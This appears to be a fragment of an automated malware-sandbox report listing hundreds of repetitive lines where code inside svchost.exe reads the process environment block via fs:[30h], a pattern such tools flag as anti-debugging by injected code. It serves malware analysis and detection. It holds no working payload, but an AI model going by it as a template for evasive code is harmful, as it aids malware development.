                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F3262C mov eax, dword ptr fs:[00000030h]8_2_02F3262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F72619 mov eax, dword ptr fs:[00000030h]8_2_02F72619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FAE609 mov eax, dword ptr fs:[00000030h]8_2_02FAE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F4260B mov eax, dword ptr fs:[00000030h]8_2_02F4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F4260B mov eax, dword ptr fs:[00000030h]8_2_02F4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F4260B mov eax, dword ptr fs:[00000030h]8_2_02F4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F4260B mov eax, dword ptr fs:[00000030h]8_2_02F4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F4260B mov eax, dword ptr fs:[00000030h]8_2_02F4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F4260B mov eax, dword ptr fs:[00000030h]8_2_02F4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F4260B mov eax, dword ptr fs:[00000030h]8_2_02F4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F347FB mov eax, dword ptr fs:[00000030h]8_2_02F347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F347FB mov eax, dword ptr fs:[00000030h]8_2_02F347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F527ED mov eax, dword ptr fs:[00000030h]8_2_02F527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F527ED mov eax, dword ptr fs:[00000030h]8_2_02F527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F527ED mov eax, dword ptr fs:[00000030h]8_2_02F527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FBE7E1 mov eax, dword ptr fs:[00000030h]8_2_02FBE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F3C7C0 mov eax, dword ptr fs:[00000030h]8_2_02F3C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB07C3 mov eax, dword ptr fs:[00000030h]8_2_02FB07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F307AF mov eax, dword ptr fs:[00000030h]8_2_02F307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FE47A0 mov eax, dword ptr fs:[00000030h]8_2_02FE47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FD678E mov eax, dword ptr fs:[00000030h]8_2_02FD678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F38770 mov eax, dword ptr fs:[00000030h]8_2_02F38770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F40770 mov eax, dword ptr fs:[00000030h]8_2_02F40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F40770 mov eax, dword ptr fs:[00000030h]8_2_02F40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F40770 mov eax, dword ptr fs:[00000030h]8_2_02F40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F40770 mov eax, dword ptr fs:[00000030h]8_2_02F40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F40770 mov eax, dword ptr fs:[00000030h]8_2_02F40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F40770 mov eax, dword ptr fs:[00000030h]8_2_02F40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F40770 mov eax, dword ptr fs:[00000030h]8_2_02F40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F40770 mov eax, dword ptr fs:[00000030h]8_2_02F40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F40770 mov eax, dword ptr fs:[00000030h]8_2_02F40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F40770 mov eax, dword ptr fs:[00000030h]8_2_02F40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F40770 mov eax, dword ptr fs:[00000030h]8_2_02F40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F40770 mov eax, dword ptr fs:[00000030h]8_2_02F40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F30750 mov eax, dword ptr fs:[00000030h]8_2_02F30750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FBE75D mov eax, dword ptr fs:[00000030h]8_2_02FBE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F72750 mov eax, dword ptr fs:[00000030h]8_2_02F72750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F72750 mov eax, dword ptr fs:[00000030h]8_2_02F72750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB4755 mov eax, dword ptr fs:[00000030h]8_2_02FB4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F6674D mov esi, dword ptr fs:[00000030h]8_2_02F6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F6674D mov eax, dword ptr fs:[00000030h]8_2_02F6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F6674D mov eax, dword ptr fs:[00000030h]8_2_02F6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F6273C mov eax, dword ptr fs:[00000030h]8_2_02F6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F6273C mov ecx, dword ptr fs:[00000030h]8_2_02F6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F6273C mov eax, dword ptr fs:[00000030h]8_2_02F6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FAC730 mov eax, dword ptr fs:[00000030h]8_2_02FAC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F6C720 mov eax, dword ptr fs:[00000030h]8_2_02F6C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F6C720 mov eax, dword ptr fs:[00000030h]8_2_02F6C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F30710 mov eax, dword ptr fs:[00000030h]8_2_02F30710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F60710 mov eax, dword ptr fs:[00000030h]8_2_02F60710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F6C700 mov eax, dword ptr fs:[00000030h]8_2_02F6C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03004500 mov eax, dword ptr fs:[00000030h]8_2_03004500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03004500 mov eax, dword ptr fs:[00000030h]8_2_03004500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03004500 mov eax, dword ptr fs:[00000030h]8_2_03004500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03004500 mov eax, dword ptr fs:[00000030h]8_2_03004500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03004500 mov eax, dword ptr fs:[00000030h]8_2_03004500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03004500 mov eax, dword ptr fs:[00000030h]8_2_03004500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03004500 mov eax, dword ptr fs:[00000030h]8_2_03004500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F304E5 mov ecx, dword ptr fs:[00000030h]8_2_02F304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F644B0 mov ecx, dword ptr fs:[00000030h]8_2_02F644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FBA4B0 mov eax, dword ptr fs:[00000030h]8_2_02FBA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F364AB mov eax, dword ptr fs:[00000030h]8_2_02F364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FEA49A mov eax, dword ptr fs:[00000030h]8_2_02FEA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F5A470 mov eax, dword ptr fs:[00000030h]8_2_02F5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F5A470 mov eax, dword ptr fs:[00000030h]8_2_02F5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F5A470 mov eax, dword ptr fs:[00000030h]8_2_02F5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FBC460 mov ecx, dword ptr fs:[00000030h]8_2_02FBC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FEA456 mov eax, dword ptr fs:[00000030h]8_2_02FEA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F2645D mov eax, dword ptr fs:[00000030h]8_2_02F2645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F5245A mov eax, dword ptr fs:[00000030h]8_2_02F5245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F6E443 mov eax, dword ptr fs:[00000030h]8_2_02F6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F6E443 mov eax, dword ptr fs:[00000030h]8_2_02F6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F6E443 mov eax, dword ptr fs:[00000030h]8_2_02F6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F6E443 mov eax, dword ptr fs:[00000030h]8_2_02F6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F6E443 mov eax, dword ptr fs:[00000030h]8_2_02F6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F6E443 mov eax, dword ptr fs:[00000030h]8_2_02F6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F6E443 mov eax, dword ptr fs:[00000030h]8_2_02F6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F6E443 mov eax, dword ptr fs:[00000030h]8_2_02F6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F6A430 mov eax, dword ptr fs:[00000030h]8_2_02F6A430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F2E420 mov eax, dword ptr fs:[00000030h]8_2_02F2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F2E420 mov eax, dword ptr fs:[00000030h]8_2_02F2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F2E420 mov eax, dword ptr fs:[00000030h]8_2_02F2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F2C427 mov eax, dword ptr fs:[00000030h]8_2_02F2C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB6420 mov eax, dword ptr fs:[00000030h]8_2_02FB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB6420 mov eax, dword ptr fs:[00000030h]8_2_02FB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB6420 mov eax, dword ptr fs:[00000030h]8_2_02FB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB6420 mov eax, dword ptr fs:[00000030h]8_2_02FB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB6420 mov eax, dword ptr fs:[00000030h]8_2_02FB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB6420 mov eax, dword ptr fs:[00000030h]8_2_02FB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB6420 mov eax, dword ptr fs:[00000030h]8_2_02FB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F68402 mov eax, dword ptr fs:[00000030h]8_2_02F68402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F68402 mov eax, dword ptr fs:[00000030h]8_2_02F68402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F68402 mov eax, dword ptr fs:[00000030h]8_2_02F68402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]8_2_02F5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]8_2_02F5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]8_2_02F5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]8_2_02F5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]8_2_02F5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]8_2_02F5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]8_2_02F5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]8_2_02F5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F325E0 mov eax, dword ptr fs:[00000030h]8_2_02F325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F6C5ED mov eax, dword ptr fs:[00000030h]8_2_02F6C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F6C5ED mov eax, dword ptr fs:[00000030h]8_2_02F6C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F365D0 mov eax, dword ptr fs:[00000030h]8_2_02F365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F6A5D0 mov eax, dword ptr fs:[00000030h]8_2_02F6A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F6A5D0 mov eax, dword ptr fs:[00000030h]8_2_02F6A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F6E5CF mov eax, dword ptr fs:[00000030h]8_2_02F6E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F6E5CF mov eax, dword ptr fs:[00000030h]8_2_02F6E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F545B1 mov eax, dword ptr fs:[00000030h]8_2_02F545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F545B1 mov eax, dword ptr fs:[00000030h]8_2_02F545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB05A7 mov eax, dword ptr fs:[00000030h]8_2_02FB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB05A7 mov eax, dword ptr fs:[00000030h]8_2_02FB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB05A7 mov eax, dword ptr fs:[00000030h]8_2_02FB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F6E59C mov eax, dword ptr fs:[00000030h]8_2_02F6E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F32582 mov eax, dword ptr fs:[00000030h]8_2_02F32582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F32582 mov ecx, dword ptr fs:[00000030h]8_2_02F32582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F64588 mov eax, dword ptr fs:[00000030h]8_2_02F64588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F6656A mov eax, dword ptr fs:[00000030h]8_2_02F6656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F6656A mov eax, dword ptr fs:[00000030h]8_2_02F6656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F6656A mov eax, dword ptr fs:[00000030h]8_2_02F6656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F38550 mov eax, dword ptr fs:[00000030h]8_2_02F38550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F38550 mov eax, dword ptr fs:[00000030h]8_2_02F38550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F40535 mov eax, dword ptr fs:[00000030h]8_2_02F40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F40535 mov eax, dword ptr fs:[00000030h]8_2_02F40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F40535 mov eax, dword ptr fs:[00000030h]8_2_02F40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F40535 mov eax, dword ptr fs:[00000030h]8_2_02F40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F40535 mov eax, dword ptr fs:[00000030h]8_2_02F40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F40535 mov eax, dword ptr fs:[00000030h]8_2_02F40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F5E53E mov eax, dword ptr fs:[00000030h]8_2_02F5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F5E53E mov eax, dword ptr fs:[00000030h]8_2_02F5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F5E53E mov eax, dword ptr fs:[00000030h]8_2_02F5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F5E53E mov eax, dword ptr fs:[00000030h]8_2_02F5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F5E53E mov eax, dword ptr fs:[00000030h]8_2_02F5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FC6500 mov eax, dword ptr fs:[00000030h]8_2_02FC6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F6AAEE mov eax, dword ptr fs:[00000030h]8_2_02F6AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F6AAEE mov eax, dword ptr fs:[00000030h]8_2_02F6AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F30AD0 mov eax, dword ptr fs:[00000030h]8_2_02F30AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F64AD0 mov eax, dword ptr fs:[00000030h]8_2_02F64AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F64AD0 mov eax, dword ptr fs:[00000030h]8_2_02F64AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F86ACC mov eax, dword ptr fs:[00000030h]8_2_02F86ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F86ACC mov eax, dword ptr fs:[00000030h]8_2_02F86ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F86ACC mov eax, dword ptr fs:[00000030h]8_2_02F86ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F38AA0 mov eax, dword ptr fs:[00000030h]8_2_02F38AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F38AA0 mov eax, dword ptr fs:[00000030h]8_2_02F38AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F86AA4 mov eax, dword ptr fs:[00000030h]8_2_02F86AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F68A90 mov edx, dword ptr fs:[00000030h]8_2_02F68A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F3EA80 mov eax, dword ptr fs:[00000030h]8_2_02F3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F3EA80 mov eax, dword ptr fs:[00000030h]8_2_02F3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F3EA80 mov eax, dword ptr fs:[00000030h]8_2_02F3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F3EA80 mov eax, dword ptr fs:[00000030h]8_2_02F3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F3EA80 mov eax, dword ptr fs:[00000030h]8_2_02F3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F3EA80 mov eax, dword ptr fs:[00000030h]8_2_02F3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F3EA80 mov eax, dword ptr fs:[00000030h]8_2_02F3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F3EA80 mov eax, dword ptr fs:[00000030h]8_2_02F3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F3EA80 mov eax, dword ptr fs:[00000030h]8_2_02F3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FACA72 mov eax, dword ptr fs:[00000030h]8_2_02FACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FACA72 mov eax, dword ptr fs:[00000030h]8_2_02FACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F6CA6F mov eax, dword ptr fs:[00000030h]8_2_02F6CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F6CA6F mov eax, dword ptr fs:[00000030h]8_2_02F6CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F6CA6F mov eax, dword ptr fs:[00000030h]8_2_02F6CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FDEA60 mov eax, dword ptr fs:[00000030h]8_2_02FDEA60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F36A50 mov eax, dword ptr fs:[00000030h]8_2_02F36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F36A50 mov eax, dword ptr fs:[00000030h]8_2_02F36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F36A50 mov eax, dword ptr fs:[00000030h]8_2_02F36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F36A50 mov eax, dword ptr fs:[00000030h]8_2_02F36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F36A50 mov eax, dword ptr fs:[00000030h]8_2_02F36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F36A50 mov eax, dword ptr fs:[00000030h]8_2_02F36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F36A50 mov eax, dword ptr fs:[00000030h]8_2_02F36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F40A5B mov eax, dword ptr fs:[00000030h]8_2_02F40A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F40A5B mov eax, dword ptr fs:[00000030h]8_2_02F40A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F54A35 mov eax, dword ptr fs:[00000030h]8_2_02F54A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F54A35 mov eax, dword ptr fs:[00000030h]8_2_02F54A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F6CA38 mov eax, dword ptr fs:[00000030h]8_2_02F6CA38
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F6CA24 mov eax, dword ptr fs:[00000030h]8_2_02F6CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F5EA2E mov eax, dword ptr fs:[00000030h]8_2_02F5EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FBCA11 mov eax, dword ptr fs:[00000030h]8_2_02FBCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F38BF0 mov eax, dword ptr fs:[00000030h]8_2_02F38BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F38BF0 mov eax, dword ptr fs:[00000030h]8_2_02F38BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F38BF0 mov eax, dword ptr fs:[00000030h]8_2_02F38BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F5EBFC mov eax, dword ptr fs:[00000030h]8_2_02F5EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FBCBF0 mov eax, dword ptr fs:[00000030h]8_2_02FBCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FDEBD0 mov eax, dword ptr fs:[00000030h]8_2_02FDEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F50BCB mov eax, dword ptr fs:[00000030h]8_2_02F50BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F50BCB mov eax, dword ptr fs:[00000030h]8_2_02F50BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F50BCB mov eax, dword ptr fs:[00000030h]8_2_02F50BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F30BCD mov eax, dword ptr fs:[00000030h]8_2_02F30BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F30BCD mov eax, dword ptr fs:[00000030h]8_2_02F30BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F30BCD mov eax, dword ptr fs:[00000030h]8_2_02F30BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F40BBE mov eax, dword ptr fs:[00000030h]8_2_02F40BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F40BBE mov eax, dword ptr fs:[00000030h]8_2_02F40BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FE4BB0 mov eax, dword ptr fs:[00000030h]8_2_02FE4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FE4BB0 mov eax, dword ptr fs:[00000030h]8_2_02FE4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03004A80 mov eax, dword ptr fs:[00000030h]8_2_03004A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F2CB7E mov eax, dword ptr fs:[00000030h]8_2_02F2CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FDEB50 mov eax, dword ptr fs:[00000030h]8_2_02FDEB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FE4B4B mov eax, dword ptr fs:[00000030h]8_2_02FE4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FE4B4B mov eax, dword ptr fs:[00000030h]8_2_02FE4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FC6B40 mov eax, dword ptr fs:[00000030h]8_2_02FC6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FC6B40 mov eax, dword ptr fs:[00000030h]8_2_02FC6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FD8B42 mov eax, dword ptr fs:[00000030h]8_2_02FD8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FFAB40 mov eax, dword ptr fs:[00000030h]8_2_02FFAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F5EB20 mov eax, dword ptr fs:[00000030h]8_2_02F5EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F5EB20 mov eax, dword ptr fs:[00000030h]8_2_02F5EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FF8B28 mov eax, dword ptr fs:[00000030h]8_2_02FF8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FF8B28 mov eax, dword ptr fs:[00000030h]8_2_02FF8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FAEB1D mov eax, dword ptr fs:[00000030h]8_2_02FAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FAEB1D mov eax, dword ptr fs:[00000030h]8_2_02FAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FAEB1D mov eax, dword ptr fs:[00000030h]8_2_02FAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FAEB1D mov eax, dword ptr fs:[00000030h]8_2_02FAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FAEB1D mov eax, dword ptr fs:[00000030h]8_2_02FAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FAEB1D mov eax, dword ptr fs:[00000030h]8_2_02FAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FAEB1D mov eax, dword ptr fs:[00000030h]8_2_02FAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FAEB1D mov eax, dword ptr fs:[00000030h]8_2_02FAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FAEB1D mov eax, dword ptr fs:[00000030h]8_2_02FAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F6C8F9 mov eax, dword ptr fs:[00000030h]8_2_02F6C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F6C8F9 mov eax, dword ptr fs:[00000030h]8_2_02F6C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FFA8E4 mov eax, dword ptr fs:[00000030h]8_2_02FFA8E4
